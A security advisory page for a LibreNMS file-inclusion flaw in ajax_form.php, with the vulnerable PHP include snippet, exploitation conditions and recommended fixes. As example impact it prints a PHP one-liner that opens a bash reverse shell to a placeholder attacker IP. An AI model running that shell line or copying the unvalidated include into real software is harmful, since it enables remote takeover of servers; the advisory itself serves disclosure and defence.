logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-54138 librenms/librenms

Package

Manager: composer
Name: librenms/librenms
Vulnerable Version: >=0 <25.7.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.0001 pctl0.0078

Details

LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting: ```php if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) { include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php'; } ``` This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities. > This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory. # Conditions for Exploitation - Attacker must be authenticated - Attacker must control a file at `includes/html/forms/{type}.inc.php` (or symlink) # Example Impact (RCE) If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the `librenms` user context: ```php <?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?> ``` https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812 --- # Recommended Fix - Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames. - Avoid passing raw POST input into `include_once`. - Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).

Metadata

Created: 2025-07-21T21:10:51Z
Modified: 2025-07-23T13:37:00Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-gq96-8w38-hhj2/GHSA-gq96-8w38-hhj2.json
CWE IDs: ["CWE-98"]
Alternative ID: GHSA-gq96-8w38-hhj2
Finding: F061
Auto approve: 1